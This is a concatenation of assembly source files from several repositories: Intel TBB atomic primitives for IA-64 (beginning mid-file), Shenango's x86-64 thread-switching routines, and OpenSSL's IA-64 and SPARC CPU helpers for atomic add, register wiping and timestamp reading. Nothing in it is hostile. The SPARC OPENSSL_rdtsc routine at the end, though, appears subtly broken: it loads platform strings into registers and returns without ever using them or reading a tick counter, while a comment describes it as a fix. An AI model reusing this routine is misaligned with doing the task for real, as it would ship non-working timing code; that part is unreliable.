(p6) br.cond.dptk Inc_8acquire
(p8) br.cond.dpnt Dec_8acquire
;;
ld8 r9=[r32]
;;
Retry_8acquire:
mov ar.ccv=r9
mov r8=r9;
add r10=r9,r33
;;
cmpxchg8.acq r9=[r32],r10,ar.ccv
;;
cmp.ne p7,p0=r8,r9
(p7) br.cond.dpnt Retry_8acquire
br.ret.sptk.many b0
Inc_8acquire:
fetchadd8.acq r8=[r32],1
br.ret.sptk.many b0
Dec_8acquire:
fetchadd8.acq r8=[r32],-1
br.ret.sptk.many b0
.endp __TBB_machine_fetchadd8acquire#
# 62 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_fetchstore8__TBB_full_fence#
.global __TBB_machine_fetchstore8__TBB_full_fence#
__TBB_machine_fetchstore8__TBB_full_fence:
mf
;;
xchg8 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore8__TBB_full_fence#
.proc __TBB_machine_fetchstore8acquire#
.global __TBB_machine_fetchstore8acquire#
__TBB_machine_fetchstore8acquire:
xchg8 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore8acquire#
# 88 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_cmpswp8__TBB_full_fence#
.global __TBB_machine_cmpswp8__TBB_full_fence#
__TBB_machine_cmpswp8__TBB_full_fence:
{
mf
br __TBB_machine_cmpswp8acquire
}
.endp __TBB_machine_cmpswp8__TBB_full_fence#
.proc __TBB_machine_cmpswp8acquire#
.global __TBB_machine_cmpswp8acquire#
__TBB_machine_cmpswp8acquire:
mov ar.ccv=r34
;;
cmpxchg8.acq r8=[r32],r33,ar.ccv
br.ret.sptk.many b0
.endp __TBB_machine_cmpswp8acquire#
// DO NOT EDIT - AUTOMATICALLY GENERATED FROM tools/generate_atomic/ipf_generate.sh
# 1 "<stdin>"
# 1 "<built-in>"
# 1 "<command line>"
# 1 "<stdin>"
// 1-byte release-ordered variants: CAS loop and cmpswp use the .rel
// instruction forms.
.section .text
.align 16
# 19 "<stdin>"
.proc __TBB_machine_fetchadd1release#
.global __TBB_machine_fetchadd1release#
__TBB_machine_fetchadd1release:
ld1 r9=[r32]
;;
Retry_1release:
mov ar.ccv=r9
mov r8=r9;
add r10=r9,r33
;;
cmpxchg1.rel r9=[r32],r10,ar.ccv
;;
cmp.ne p7,p0=r8,r9
(p7) br.cond.dpnt Retry_1release
br.ret.sptk.many b0
# 49 "<stdin>"
.endp __TBB_machine_fetchadd1release#
# 62 "<stdin>"
.section .text
.align 16
// NOTE(review): xchg on IPF has acquire semantics only; the preceding
// mf is what supplies the release ordering here -- confirm vs. Itanium SDM.
.proc __TBB_machine_fetchstore1release#
.global __TBB_machine_fetchstore1release#
__TBB_machine_fetchstore1release:
mf
;;
xchg1 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore1release#
# 88 "<stdin>"
.section .text
.align 16
# 101 "<stdin>"
.proc __TBB_machine_cmpswp1release#
.global __TBB_machine_cmpswp1release#
__TBB_machine_cmpswp1release:
zxt1 r34=r34
;;
mov ar.ccv=r34
;;
cmpxchg1.rel r8=[r32],r33,ar.ccv
br.ret.sptk.many b0
.endp __TBB_machine_cmpswp1release#
// DO NOT EDIT - AUTOMATICALLY GENERATED FROM tools/generate_atomic/ipf_generate.sh
# 1 "<stdin>"
# 1 "<built-in>"
# 1 "<command line>"
# 1 "<stdin>"
.section .text
.align 16
# 19 "<stdin>"
// Atomic 2-byte fetch-and-add with release ordering (CAS loop).
// In: r32 = address, r33 = addend.  Out: r8 = value before the add.
.proc __TBB_machine_fetchadd2release#
.global __TBB_machine_fetchadd2release#
__TBB_machine_fetchadd2release:
ld2 r9=[r32] // initial snapshot
;;
Retry_2release:
mov ar.ccv=r9 // expected value
mov r8=r9; // return value if CAS succeeds
add r10=r9,r33 // proposed new value
;;
cmpxchg2.rel r9=[r32],r10,ar.ccv
;;
cmp.ne p7,p0=r8,r9 // retry with fresh snapshot on failure
(p7) br.cond.dpnt Retry_2release
br.ret.sptk.many b0
# 49 "<stdin>"
.endp __TBB_machine_fetchadd2release#
# 62 "<stdin>"
.section .text
.align 16
// Atomic 2-byte exchange; fence first for release ordering.
// In: r32 = address, r33 = new value.  Out: r8 = old value.
.proc __TBB_machine_fetchstore2release#
.global __TBB_machine_fetchstore2release#
__TBB_machine_fetchstore2release:
mf
;;
xchg2 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore2release#
# 88 "<stdin>"
.section .text
.align 16
# 101 "<stdin>"
// 2-byte compare-and-swap, release ordering.
// In: r32 = address, r33 = new value, r34 = comparand.  Out: r8 = old value.
.proc __TBB_machine_cmpswp2release#
.global __TBB_machine_cmpswp2release#
__TBB_machine_cmpswp2release:
zxt2 r34=r34 // zero-extend comparand to 16 bits
;;
mov ar.ccv=r34
;;
cmpxchg2.rel r8=[r32],r33,ar.ccv
br.ret.sptk.many b0
.endp __TBB_machine_cmpswp2release#
// DO NOT EDIT - AUTOMATICALLY GENERATED FROM tools/generate_atomic/ipf_generate.sh
# 1 "<stdin>"
# 1 "<built-in>"
# 1 "<command line>"
# 1 "<stdin>"
.section .text
.align 16
# 19 "<stdin>"
// Atomic 4-byte fetch-and-add with release ordering.
// Fast path: addend +1/-1 uses the hardware fetchadd4.rel instruction
// (which only supports small immediates); any other addend falls back
// to a CAS loop.  In: r32 = address, r33 = addend.  Out: r8 = old value.
.proc __TBB_machine_fetchadd4release#
.global __TBB_machine_fetchadd4release#
__TBB_machine_fetchadd4release:
cmp.eq p6,p0=1,r33 // addend == +1 ?
cmp.eq p8,p0=-1,r33 // addend == -1 ?
(p6) br.cond.dptk Inc_4release
(p8) br.cond.dpnt Dec_4release
;;
ld4 r9=[r32] // general case: snapshot current value
;;
Retry_4release:
mov ar.ccv=r9
mov r8=r9;
add r10=r9,r33
;;
cmpxchg4.rel r9=[r32],r10,ar.ccv
;;
cmp.ne p7,p0=r8,r9 // retry until CAS succeeds
(p7) br.cond.dpnt Retry_4release
br.ret.sptk.many b0
Inc_4release:
fetchadd4.rel r8=[r32],1
br.ret.sptk.many b0
Dec_4release:
fetchadd4.rel r8=[r32],-1
br.ret.sptk.many b0
.endp __TBB_machine_fetchadd4release#
# 62 "<stdin>"
.section .text
.align 16
// Atomic 4-byte exchange; fence first for release ordering.
// In: r32 = address, r33 = new value.  Out: r8 = old value.
.proc __TBB_machine_fetchstore4release#
.global __TBB_machine_fetchstore4release#
__TBB_machine_fetchstore4release:
mf
;;
xchg4 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore4release#
# 88 "<stdin>"
.section .text
.align 16
# 101 "<stdin>"
// 4-byte compare-and-swap, release ordering.
// In: r32 = address, r33 = new value, r34 = comparand.  Out: r8 = old value.
.proc __TBB_machine_cmpswp4release#
.global __TBB_machine_cmpswp4release#
__TBB_machine_cmpswp4release:
zxt4 r34=r34 // zero-extend comparand to 32 bits
;;
mov ar.ccv=r34
;;
cmpxchg4.rel r8=[r32],r33,ar.ccv
br.ret.sptk.many b0
.endp __TBB_machine_cmpswp4release#
// DO NOT EDIT - AUTOMATICALLY GENERATED FROM tools/generate_atomic/ipf_generate.sh
# 1 "<stdin>"
# 1 "<built-in>"
# 1 "<command line>"
# 1 "<stdin>"
.section .text
.align 16
# 19 "<stdin>"
// Atomic 8-byte fetch-and-add with release ordering.
// Same structure as the 4-byte variant: +1/-1 use fetchadd8.rel,
// everything else goes through a CAS loop.
// In: r32 = address, r33 = addend.  Out: r8 = old value.
.proc __TBB_machine_fetchadd8release#
.global __TBB_machine_fetchadd8release#
__TBB_machine_fetchadd8release:
cmp.eq p6,p0=1,r33 // addend == +1 ?
cmp.eq p8,p0=-1,r33 // addend == -1 ?
(p6) br.cond.dptk Inc_8release
(p8) br.cond.dpnt Dec_8release
;;
ld8 r9=[r32] // general case: snapshot current value
;;
Retry_8release:
mov ar.ccv=r9
mov r8=r9;
add r10=r9,r33
;;
cmpxchg8.rel r9=[r32],r10,ar.ccv
;;
cmp.ne p7,p0=r8,r9 // retry until CAS succeeds
(p7) br.cond.dpnt Retry_8release
br.ret.sptk.many b0
Inc_8release:
fetchadd8.rel r8=[r32],1
br.ret.sptk.many b0
Dec_8release:
fetchadd8.rel r8=[r32],-1
br.ret.sptk.many b0
.endp __TBB_machine_fetchadd8release#
# 62 "<stdin>"
.section .text
.align 16
// Atomic 8-byte exchange; fence first for release ordering.
// In: r32 = address, r33 = new value.  Out: r8 = old value.
.proc __TBB_machine_fetchstore8release#
.global __TBB_machine_fetchstore8release#
__TBB_machine_fetchstore8release:
mf
;;
xchg8 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore8release#
# 88 "<stdin>"
.section .text
.align 16
# 101 "<stdin>"
// 8-byte compare-and-swap, release ordering.  No zero-extension needed:
// the comparand already fills the full register.
// In: r32 = address, r33 = new value, r34 = comparand.  Out: r8 = old value.
.proc __TBB_machine_cmpswp8release#
.global __TBB_machine_cmpswp8release#
__TBB_machine_cmpswp8release:
mov ar.ccv=r34
;;
cmpxchg8.rel r8=[r32],r33,ar.ccv
br.ret.sptk.many b0
.endp __TBB_machine_cmpswp8release#
|
aiekick/Lumo
| 1,270
|
3rdparty/taskflow/3rd-party/tbb/src/tbb/ia64-gas/lock_byte.s
|
// Copyright (c) 2005-2020 Intel Corporation
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Support for class TinyLock
.section .text
.align 16
// unsigned int __TBB_machine_trylockbyte( byte& flag );
// r32 = address of flag
// unsigned int __TBB_machine_trylockbyte( byte& flag ):
// single attempt to acquire a byte lock.  Returns 1 in r8 if the flag
// was changed 0 -> 1 by this call, 0 otherwise (lock already held or
// CAS lost the race).  Non-blocking: never spins.
.proc __TBB_machine_trylockbyte#
.global __TBB_machine_trylockbyte#
ADDRESS_OF_FLAG=r32
RETCODE=r8
FLAG=r9
BUSY=r10
SCRATCH=r11
__TBB_machine_trylockbyte:
ld1.acq FLAG=[ADDRESS_OF_FLAG] // cheap read before attempting CAS
mov BUSY=1
mov RETCODE=0 // default: failed to acquire
;;
cmp.ne p6,p0=0,FLAG
mov ar.ccv=r0 // comparand = 0 (unlocked)
(p6) br.ret.sptk.many b0 // already locked: bail out with 0
;;
cmpxchg1.acq SCRATCH=[ADDRESS_OF_FLAG],BUSY,ar.ccv // Try to acquire lock
;;
cmp.eq p6,p0=0,SCRATCH // old value 0 means we won
;;
(p6) mov RETCODE=1
br.ret.sptk.many b0
.endp __TBB_machine_trylockbyte#
|
aiekick/Lumo
| 2,687
|
3rdparty/taskflow/3rd-party/tbb/src/tbb/ia64-gas/ia64_misc.s
|
// Copyright (c) 2005-2020 Intel Corporation
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// RSE backing store pointer retrieval
.section .text
.align 16
// Returns the current RSE backing-store pointer (ar.bsp) in r8.
.proc __TBB_get_bsp#
.global __TBB_get_bsp#
__TBB_get_bsp:
mov r8=ar.bsp
br.ret.sptk.many b0
.endp __TBB_get_bsp#
// Relaxed (unordered) load/store helpers for 8/4/2/1-byte quantities.
// Each load takes the address in r32 and returns the value in r8;
// each store takes the address in r32 and the value in r33.
// Plain ld/st instructions are used, so no ordering is implied.
.section .text
.align 16
.proc __TBB_machine_load8_relaxed#
.global __TBB_machine_load8_relaxed#
__TBB_machine_load8_relaxed:
ld8 r8=[r32]
br.ret.sptk.many b0
.endp __TBB_machine_load8_relaxed#
.section .text
.align 16
.proc __TBB_machine_store8_relaxed#
.global __TBB_machine_store8_relaxed#
__TBB_machine_store8_relaxed:
st8 [r32]=r33
br.ret.sptk.many b0
.endp __TBB_machine_store8_relaxed#
.section .text
.align 16
.proc __TBB_machine_load4_relaxed#
.global __TBB_machine_load4_relaxed#
__TBB_machine_load4_relaxed:
ld4 r8=[r32]
br.ret.sptk.many b0
.endp __TBB_machine_load4_relaxed#
.section .text
.align 16
.proc __TBB_machine_store4_relaxed#
.global __TBB_machine_store4_relaxed#
__TBB_machine_store4_relaxed:
st4 [r32]=r33
br.ret.sptk.many b0
.endp __TBB_machine_store4_relaxed#
.section .text
.align 16
.proc __TBB_machine_load2_relaxed#
.global __TBB_machine_load2_relaxed#
__TBB_machine_load2_relaxed:
ld2 r8=[r32]
br.ret.sptk.many b0
.endp __TBB_machine_load2_relaxed#
.section .text
.align 16
.proc __TBB_machine_store2_relaxed#
.global __TBB_machine_store2_relaxed#
__TBB_machine_store2_relaxed:
st2 [r32]=r33
br.ret.sptk.many b0
.endp __TBB_machine_store2_relaxed#
.section .text
.align 16
.proc __TBB_machine_load1_relaxed#
.global __TBB_machine_load1_relaxed#
__TBB_machine_load1_relaxed:
ld1 r8=[r32]
br.ret.sptk.many b0
.endp __TBB_machine_load1_relaxed#
.section .text
.align 16
.proc __TBB_machine_store1_relaxed#
.global __TBB_machine_store1_relaxed#
__TBB_machine_store1_relaxed:
st1 [r32]=r33
br.ret.sptk.many b0
.endp __TBB_machine_store1_relaxed#
|
AIFM-sys/AIFM
| 4,487
|
shenango/runtime/switch.S
|
/*
* tf.S - assembly routines for switching trap frames
*/
/*
* Trap Frame Format
* WARNING: These values reflect the layout of struct thread_tf. Don't change
* these values without also updating defs.h.
*/
.file "switch.S"
.text
/* arguments registers (can be clobbered) */
#define RDI (0)
#define RSI (8)
#define RDX (16)
#define RCX (24)
#define R8 (32)
#define R9 (40)
/* temporary registers (can be clobbered) */
#define R10 (48)
#define R11 (56)
/* callee-saved registers (can not be clobbered) */
#define RBX (64)
#define RBP (72)
#define R12 (80)
#define R13 (88)
#define R14 (96)
#define R15 (104)
/* special-purpose registers */
#define RAX (112) /* return code */
#define RIP (120) /* instruction pointer */
#define RSP (128) /* stack pointer */
/**
* __jmp_thread - executes a thread from the runtime
* @tf: the trap frame to restore (%rdi)
*
* This low-level variant isn't intended to be called directly.
* Re-enables preemption, parking the kthread if necessary.
* Does not return.
*/
/* x86-64 SysV.  %rdi = struct thread_tf to restore (offsets are the
 * RBX/RBP/... macros above).  Restores callee-saved state, then jumps
 * to the saved RIP; does not return. */
.align 16
.globl __jmp_thread
.type __jmp_thread, @function
__jmp_thread:
/* restore callee regs */
movq RBX(%rdi), %rbx
movq RBP(%rdi), %rbp
movq R12(%rdi), %r12
movq R13(%rdi), %r13
movq R14(%rdi), %r14
movq R15(%rdi), %r15
/* restore ip and stack */
movq RSP(%rdi), %rsp
movq RIP(%rdi), %rsi        /* target PC kept in a scratch reg */
/* set first argument (in case new thread) */
movq RDI(%rdi), %rdi /* ARG0 */
/* re-enable preemption */
subl $1, %fs:preempt_cnt@tpoff
jz 1f                       /* count hit zero: preemption pending */
/* jump into trap frame */
jmpq *%rsi
nop
1: /* cold-path, save RIP and park the kthread */
pushq %rsi
pushq %rdi
call preempt
popq %rdi
popq %rsi
jmpq *%rsi
/**
* __jmp_thread_direct - directly switches from one thread to the next
* @oldtf: the trap frame to save (%rdi)
* @newtf: the trap frame to restore (%rsi)
* @stack_busy: a pointer to the busy stack flag owned by the old thread (%rdx)
*
* This low-level variant isn't intended to be called directly.
* Re-enables preemption, parking the kthread if necessary.
* Does return.
*/
/* x86-64 SysV.  %rdi = old trap frame (saved into), %rsi = new trap
 * frame (restored from), %rdx = &old thread's stack-busy flag, cleared
 * once we are off the old stack.  Returns when the old frame is later
 * resumed. */
.align 16
.globl __jmp_thread_direct
.type __jmp_thread_direct, @function
__jmp_thread_direct:
/* save ip and stack */
movq (%rsp), %r8            /* return address = resume RIP */
movq %r8, RIP(%rdi)
leaq 8(%rsp), %r8           /* caller's RSP after our ret would pop */
movq %r8, RSP(%rdi)
/* save callee regs */
movq %rbx, RBX(%rdi)
movq %rbp, RBP(%rdi)
movq %r12, R12(%rdi)
movq %r13, R13(%rdi)
movq %r14, R14(%rdi)
movq %r15, R15(%rdi)
/* restore ip and stack */
movq RSP(%rsi), %rsp
movq RIP(%rsi), %rcx
/* clear the stack busy flag */
movl $0, (%rdx)             /* safe now: we run on the new stack */
/* restore callee regs */
movq RBX(%rsi), %rbx
movq RBP(%rsi), %rbp
movq R12(%rsi), %r12
movq R13(%rsi), %r13
movq R14(%rsi), %r14
movq R15(%rsi), %r15
/* set first argument (in case new thread) */
movq RDI(%rsi), %rdi /* ARG0 */
/* re-enable preemption */
subl $1, %fs:preempt_cnt@tpoff
jz 1f                       /* count hit zero: preemption pending */
/* jump into trap frame */
jmpq *%rcx
nop
1: /* cold-path, save RIP and park the kthread */
pushq %rcx
pushq %rdi
call preempt
popq %rdi
popq %rcx
jmpq *%rcx
/**
* __jmp_runtime - saves the current trap frame and jumps to a function in the
* runtime
* @tf: the struct thread_tf to save state (%rdi)
* @fn: the function pointer to call (%rsi)
* @stack: the start of the runtime stack (%rdx)
*
* This low-level variant isn't intended to be called directly.
* Must be called with preemption disabled.
* No return value.
*/
/* x86-64 SysV.  %rdi = trap frame to save the current context into,
 * %rsi = runtime function to jump to, %rdx = top of the runtime stack.
 * Saves callee-saved state + resume RIP/RSP, switches stacks, then
 * tail-jumps into the runtime function. */
.align 16
.globl __jmp_runtime
.type __jmp_runtime, @function
__jmp_runtime:
/* save callee regs */
movq %rbx, RBX(%rdi)
movq %rbp, RBP(%rdi)
movq %r12, R12(%rdi)
movq %r13, R13(%rdi)
movq %r14, R14(%rdi)
movq %r15, R15(%rdi)
/* save ip and stack */
movq (%rsp), %r8            /* return address = resume RIP */
movq %r8, RIP(%rdi)
leaq 8(%rsp), %r8
movq %r8, RSP(%rdi)
/* jump into runtime function */
movq %rdx, %rsp             /* switch to the runtime stack */
/* jump into runtime code */
jmpq *%rsi
/**
* __jmp_runtime_nosave - jumps to a function in the runtime without saving the
* current stack frame
* @fn: the function pointer to call (%rdi)
* @stack: the start of the runtime stack (%rsi)
*
* This low-level variant isn't intended to be called directly.
* Must be called with preemption disabled.
* No return value.
*/
/* x86-64 SysV.  %rdi = runtime function, %rsi = top of runtime stack.
 * Switches stacks and jumps; the current context is deliberately not
 * saved. */
.align 16
.globl __jmp_runtime_nosave
.type __jmp_runtime_nosave, @function
__jmp_runtime_nosave:
/* jump into runtime function */
movq %rsi, %rsp             /* switch to the runtime stack */
movq %rdi, %rsi             /* keep target in a scratch reg */
/* jump into runtime code */
jmpq *%rsi
|
AIFM-sys/AIFM
| 2,571
|
shenango/apps/parsec/pkgs/libs/ssl/src/crypto/ia64cpuid.S
|
// Works on all IA-64 platforms: Linux, HP-UX, Win64i...
// On Win64i compile with ias.exe.
.text
// Returns the IA-64 interval time counter (ar.itc) in r8 -- the
// Itanium analogue of x86 rdtsc.
.global OPENSSL_rdtsc#
.proc OPENSSL_rdtsc#
OPENSSL_rdtsc:
{ .mib; mov r8=ar.itc
br.ret.sptk.many b0 };;
.endp OPENSSL_rdtsc#
// int OPENSSL_atomic_add(int *addr /*r32*/, int delta /*r33*/):
// CAS spin loop; returns the sign-extended new value in r8.
.global OPENSSL_atomic_add#
.proc OPENSSL_atomic_add#
.align 32
OPENSSL_atomic_add:
{ .mii; ld4 r2=[r32] // snapshot current value
nop.i 0
nop.i 0 };;
.Lspin:
{ .mii; mov ar.ccv=r2 // expected old value
add r8=r2,r33 // proposed new value
mov r3=r2 };;
{ .mmi; mf
cmpxchg4.acq r2=[r32],r8,ar.ccv // r2 = actual old value
nop.i 0 };;
{ .mib; cmp.ne p6,p0=r2,r3 // lost the race -> retry
nop.i 0
(p6) br.dpnt .Lspin };;
{ .mib; nop.m 0
sxt4 r8=r8 // sign-extend 32-bit result to 64
br.ret.sptk.many b0 };;
.endp OPENSSL_atomic_add#
// Returns a structure comprising pointer to the top of stack of
// the caller and pointer beyond backing storage for the current
// register frame. The latter is required, because it might be
// insufficient to wipe backing storage for the current frame
// (as this procedure does), one might have to go further, toward
// higher addresses to reach for whole "retroactively" saved
// context...
// Scrubs general and FP registers (and the current frame's backing
// store) with zeroes.  Returns r8 = caller's stack pointer, r9 = end
// of backing storage for the current register frame (see comment
// above this proc in the original file).
.global OPENSSL_wipe_cpu#
.proc OPENSSL_wipe_cpu#
.align 32
OPENSSL_wipe_cpu:
.prologue
.fframe 0
.save ar.pfs,r2
.save ar.lc,r3
{ .mib; alloc r2=ar.pfs,0,96,0,96 // allocate 96 rotating locals
mov r3=ar.lc
brp.loop.imp .L_wipe_top,.L_wipe_end-16
};;
{ .mii; mov r9=ar.bsp
mov r8=pr
mov ar.lc=96 };; // 96 loop iterations below
.body
{ .mii; add r9=96*8-8,r9
mov ar.ec=1 };;
// One can sweep double as fast, but then we can't quarantee
// that backing storage is wiped...
.L_wipe_top:
{ .mfi; st8 [r9]=r0,-8 // zero backing store, walking down
mov f127=f0
mov r127=r0 }
{ .mfb; nop.m 0
nop.f 0
br.ctop.sptk .L_wipe_top };;
.L_wipe_end:
// Zero the static registers not covered by the rotating loop.
{ .mfi; mov r11=r0
mov f6=f0
mov r14=r0 }
{ .mfi; mov r15=r0
mov f7=f0
mov r16=r0 }
{ .mfi; mov r17=r0
mov f8=f0
mov r18=r0 }
{ .mfi; mov r19=r0
mov f9=f0
mov r20=r0 }
{ .mfi; mov r21=r0
mov f10=f0
mov r22=r0 }
{ .mfi; mov r23=r0
mov f11=f0
mov r24=r0 }
{ .mfi; mov r25=r0
mov f12=f0
mov r26=r0 }
{ .mfi; mov r27=r0
mov f13=f0
mov r28=r0 }
{ .mfi; mov r29=r0
mov f14=f0
mov r30=r0 }
{ .mfi; mov r31=r0
mov f15=f0
nop.i 0 }
{ .mfi; mov f16=f0 }
{ .mfi; mov f17=f0 }
{ .mfi; mov f18=f0 }
{ .mfi; mov f19=f0 }
{ .mfi; mov f20=f0 }
{ .mfi; mov f21=f0 }
{ .mfi; mov f22=f0 }
{ .mfi; mov f23=f0 }
{ .mfi; mov f24=f0 }
{ .mfi; mov f25=f0 }
{ .mfi; mov f26=f0 }
{ .mfi; mov f27=f0 }
{ .mfi; mov f28=f0 }
{ .mfi; mov f29=f0 }
{ .mfi; mov f30=f0 }
{ .mfi; add r9=96*8+8,r9 // r9 = end of wiped backing storage
mov f31=f0
mov pr=r8,0x1ffff } // restore predicate registers
{ .mib; mov r8=sp // return caller's top of stack
mov ar.lc=r3
br.ret.sptk b0 };;
.endp OPENSSL_wipe_cpu#
|
AIFM-sys/AIFM
| 4,690
|
shenango/apps/parsec/pkgs/libs/ssl/src/crypto/sparccpuid.S
|
#if defined(__SUNPRO_C) && defined(__sparcv9)
# define ABI64 /* They've said -xarch=v9 at command line */
#elif defined(__GNUC__) && defined(__arch64__)
# define ABI64 /* They've said -m64 at command line */
#endif
#ifdef ABI64
.register %g2,#scratch
.register %g3,#scratch
# define FRAME -192
# define BIAS 2047
#else
# define FRAME -96
# define BIAS 0
#endif
.text
.align 32
! SPARC variant: zeroes integer and FP registers (V9 additionally wipes
! the upper FP bank via hard-coded fmovd encodings) and walks register
! windows via .walk.reg.wins (or ta ST_CLEAN_WINDOWS on Solaris).
! Returns %o0 = pointer to the caller's top of stack.
.global OPENSSL_wipe_cpu
.type OPENSSL_wipe_cpu,#function
! Keep in mind that this does not excuse us from wiping the stack!
! This routine wipes registers, but not the backing store [which
! resides on the stack, toward lower addresses]. To facilitate for
! stack wiping I return pointer to the top of stack of the *caller*.
OPENSSL_wipe_cpu:
save %sp,FRAME,%sp
nop
#ifdef __sun
#include <sys/trap.h>
ta ST_CLEAN_WINDOWS
#else
call .walk.reg.wins
#endif
nop
call .PIC.zero.up
mov .zero-(.-4),%o0 ! PIC-safe address of the .zero constant
ldd [%o0],%f0 ! %f0:%f1 = 0.0, the wipe pattern
subcc %g0,1,%o0
! Following is V9 "rd %ccr,%o0" instruction. However! V8
! specification says that it ("rd %asr2,%o0" in V8 terms) does
! not cause illegal_instruction trap. It therefore can be used
! to determine if the CPU the code is executing on is V8- or
! V9-compliant, as V9 returns a distinct value of 0x99,
! "negative" and "borrow" bits set in both %icc and %xcc.
.word 0x91408000 !rd %ccr,%o0
cmp %o0,0x99
bne .v8
nop
! Even though we do not use %fp register bank,
! we wipe it as memcpy might have used it...
.word 0xbfa00040 !fmovd %f0,%f62
.word 0xbba00040 !...
.word 0xb7a00040
.word 0xb3a00040
.word 0xafa00040
.word 0xaba00040
.word 0xa7a00040
.word 0xa3a00040
.word 0x9fa00040
.word 0x9ba00040
.word 0x97a00040
.word 0x93a00040
.word 0x8fa00040
.word 0x8ba00040
.word 0x87a00040
.word 0x83a00040 !fmovd %f0,%f32
.v8: fmovs %f1,%f31 ! interleave FP and integer register wipes
clr %o0
fmovs %f0,%f30
clr %o1
fmovs %f1,%f29
clr %o2
fmovs %f0,%f28
clr %o3
fmovs %f1,%f27
clr %o4
fmovs %f0,%f26
clr %o5
fmovs %f1,%f25
clr %o7
fmovs %f0,%f24
clr %l0
fmovs %f1,%f23
clr %l1
fmovs %f0,%f22
clr %l2
fmovs %f1,%f21
clr %l3
fmovs %f0,%f20
clr %l4
fmovs %f1,%f19
clr %l5
fmovs %f0,%f18
clr %l6
fmovs %f1,%f17
clr %l7
fmovs %f0,%f16
clr %i0
fmovs %f1,%f15
clr %i1
fmovs %f0,%f14
clr %i2
fmovs %f1,%f13
clr %i3
fmovs %f0,%f12
clr %i4
fmovs %f1,%f11
clr %i5
fmovs %f0,%f10
clr %g1
fmovs %f1,%f9
clr %g2
fmovs %f0,%f8
clr %g3
fmovs %f1,%f7
clr %g4
fmovs %f0,%f6
clr %g5
fmovs %f1,%f5
fmovs %f0,%f4
fmovs %f1,%f3
fmovs %f0,%f2
add %fp,BIAS,%i0 ! return pointer to callers top of stack
ret
restore
.zero: .long 0x0,0x0
.PIC.zero.up: ! helper: %o0 += return address (PC-relative fixup)
retl
add %o0,%o7,%o0
#ifdef DEBUG
.global walk_reg_wins
.type walk_reg_wins,#function
walk_reg_wins:
#endif
! Recursively flushes and wipes register windows until the saved
! return addresses coincide (window already flushed).
.walk.reg.wins:
save %sp,FRAME,%sp
cmp %i7,%o7
be 2f
clr %o0
cmp %o7,0 ! compiler never cleans %o7...
be 1f ! could have been a leaf function...
clr %o1
call .walk.reg.wins
nop
1: clr %o2
clr %o3
clr %o4
clr %o5
clr %o7
clr %l0
clr %l1
clr %l2
clr %l3
clr %l4
clr %l5
clr %l6
clr %l7
add %o0,1,%i0 ! used for debugging
2: ret
restore
.size OPENSSL_wipe_cpu,.-OPENSSL_wipe_cpu
! int OPENSSL_atomic_add(int *addr /*%o0*/, int delta /*%o1*/):
! V9 path uses cas in a retry loop; V8 fallback simulates a lock by
! swapping in -1 and yielding while another CPU holds it.
! Returns the new (sign-extended) value.
.global OPENSSL_atomic_add
.type OPENSSL_atomic_add,#function
OPENSSL_atomic_add:
#ifndef ABI64
subcc %g0,1,%o2
.word 0x95408000 !rd %ccr,%o2, see comment above
cmp %o2,0x99 ! 0x99 identifies a V9 CPU
be .v9
nop
save %sp,FRAME,%sp
ba .enter
nop
#ifdef __sun
! Note that you don't have to link with libthread to call thr_yield,
! as libc provides a stub, which is overloaded the moment you link
! with *either* libpthread or libthread...
#define YIELD_CPU thr_yield
#else
! applies at least to Linux and FreeBSD... Feedback expected...
#define YIELD_CPU sched_yield
#endif
.spin: call YIELD_CPU
nop
.enter: ld [%i0],%i2
cmp %i2,-4096 ! -4096..-1 treated as "locked" marker range
be .spin
mov -1,%i2
swap [%i0],%i2 ! take the "lock" by swapping in -1
cmp %i2,-1
be .spin ! someone else holds it: yield and retry
add %i2,%i1,%i2
stbar
st %i2,[%i0] ! store new value, releasing the "lock"
sra %i2,%g0,%i0
ret
restore
.v9:
#endif
ld [%o0],%o2
1: add %o1,%o2,%o3
.word 0xd7e2100a !cas [%o0],%o2,%o3, compare [%o0] with %o2 and swap %o3
cmp %o2,%o3 ! unchanged means the cas succeeded
bne 1b
mov %o3,%o2 ! cas is always fetching to dest. register
add %o1,%o2,%o0 ! OpenSSL expects the new value
retl
sra %o0,%g0,%o0 ! we return signed int, remember?
.size OPENSSL_atomic_add,.-OPENSSL_atomic_add
! OPENSSL_rdtsc (SPARC): probes for a V9 CPU via the "rd %ccr" trick
! (see OPENSSL_wipe_cpu above); on V8 it returns 0 via .notsc.
! The V9 path queries sysinfo(SI_PLATFORM) into a stack buffer.
! Fix vs. previous revision: the OPENSSL_rdtsc: label was missing, so
! the .global/.type directives referenced an undefined symbol and the
! body was unreachable by name; .size was also computed from the wrong
! symbol (OPENSSL_atomic_add).
.global OPENSSL_rdtsc
OPENSSL_rdtsc:
subcc %g0,1,%o0
.word 0x91408000 !rd %ccr,%o0
cmp %o0,0x99 ! V9 signature
bne .notsc
xor %o0,%o0,%o0 ! delay slot: default return 0
save %sp,FRAME-16,%sp
mov 513,%o0 !SI_PLATFORM
add %sp,BIAS+16,%o1
call sysinfo
mov 256,%o2 ! delay slot: buffer length
add %sp,BIAS-16,%o1
ld [%o1],%l0
ld [%o1+4],%l1
ld [%o1+8],%l2
mov %lo('SUNW'),%l3
ret
restore
.notsc:
retl
nop
.type OPENSSL_rdtsc,#function
.size OPENSSL_rdtsc,.-OPENSSL_rdtsc
|
AIFM-sys/AIFM
| 5,981
|
